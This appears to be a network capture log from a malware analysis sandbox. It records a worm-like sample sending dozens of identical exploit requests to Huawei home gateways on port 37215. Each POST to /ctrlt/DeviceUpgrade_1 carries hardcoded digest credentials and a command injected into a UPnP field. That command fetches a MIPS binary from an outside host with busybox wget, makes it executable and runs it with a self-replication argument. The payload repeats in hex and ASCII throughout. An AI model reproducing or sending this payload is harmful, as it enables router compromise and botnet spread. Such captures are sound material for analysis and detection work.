                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          835192.168.2.2354074157.12.110.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241957903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          836192.168.2.2352390197.94.90.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241974115 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          837192.168.2.2348566108.106.80.13737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241981983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          838192.168.2.2340548147.108.183.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.241993904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          839192.168.2.2355508107.57.130.14237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.242018938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          840192.168.2.236062877.142.84.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.242580891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          841192.168.2.2349818118.152.128.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.242640018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          842192.168.2.235189441.210.246.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.242657900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          843192.168.2.2341972197.34.46.937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.242661953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          844192.168.2.2355072157.185.3.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243213892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          845192.168.2.2350226157.132.8.16737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.243227959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
